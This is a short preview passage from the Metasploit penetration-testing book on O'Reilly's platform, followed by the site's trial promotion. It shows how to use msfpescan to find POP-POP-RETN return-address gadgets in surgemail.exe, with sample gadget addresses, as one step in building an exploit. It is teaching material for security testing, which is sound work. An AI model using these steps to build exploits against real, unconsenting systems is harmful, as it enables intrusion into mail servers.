Getting a Return Address

The next step is to locate a POP-POP-RETN sequence in surgemail.exe. To do so, copy the executable to a location on your Back|Track machine, and then use the -p switch with msfpescan to locate a suitable candidate, as in the following example:

root@bt:/tmp# msfpescan -p surgemail.exe

[surgemail.exe]
0x0042e947 pop esi; pop ebp; ret
0x0042f88b pop esi; pop ebp; ret
0x00458e68 pop esi; pop ebp; ret
0x00458edb pop esi; pop ebp; ret
0x0046754d pop esi; pop ebp; ret
0x00467578 pop esi; pop ebp; ret
0x0046d204 pop eax; pop ebp; ret

. . . SNIP . . .

0x0078506e pop ebx; pop ebp; ret
0x00785105 pop ecx; pop ebx; ret
0x0078517e pop esi; pop ebx; ret

When msfpescan is run against the target executable, it reads through the machine ...

Get Metasploit now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Metasploit by David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni

Getting a Return Address

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly